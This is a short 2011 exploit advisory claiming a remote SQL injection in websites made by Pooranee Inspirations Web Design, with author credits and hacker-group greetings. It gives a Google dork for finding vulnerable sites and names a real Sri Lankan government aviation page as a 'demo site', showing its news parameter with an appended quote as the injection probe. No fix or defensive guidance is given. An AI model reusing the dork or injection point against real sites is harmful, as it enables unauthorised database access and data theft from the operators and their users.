Pooranee Inspirations Web Design suffers from a remote SQL injection vulnerability.
bb6a0508e735679cfa0a579e4c62c360eef1265f461463b5588c87599206ee8f
################################################################################
# [x] Exploit Title: Pooranee Inspirations Web Design SQL Ýnjection Vulnerability
#
# [x] Date: 31/08/2011
#
# [x] Author: 3spi0n
#
# [x] HomePage: Http://Www.3spi0n.NET / Facebook.Com/3spi0ne
#
# [x] E-Mail: 3spi0n[at]gmail[dot]com | Http://Twitter.Com/RigidusCO
#
# [x] Software Link: https://www.pooranee.lk/
#
# [x] Category: WebApps
#
# [x] Google Dork: * "Powered By Pooranee Inspirations" [Developable]
#
# [x] Vuln. File: Changer
#################################################################################
[~] Demo Site: https://www.ports-aviation.gov.lk/news_more.php?news=116
[~] https://www.ports-aviation.gov.lk/news_more.php?news=116"
===========================================================================
.# Sometimes too far away, sometimes as close as a breath!
[Black_Umo] [TrSniper] [Mr.PaPaRoSSe] [Legend Coder] And More..
.# We Are From Turkey.
===========================================================================
.# Finished.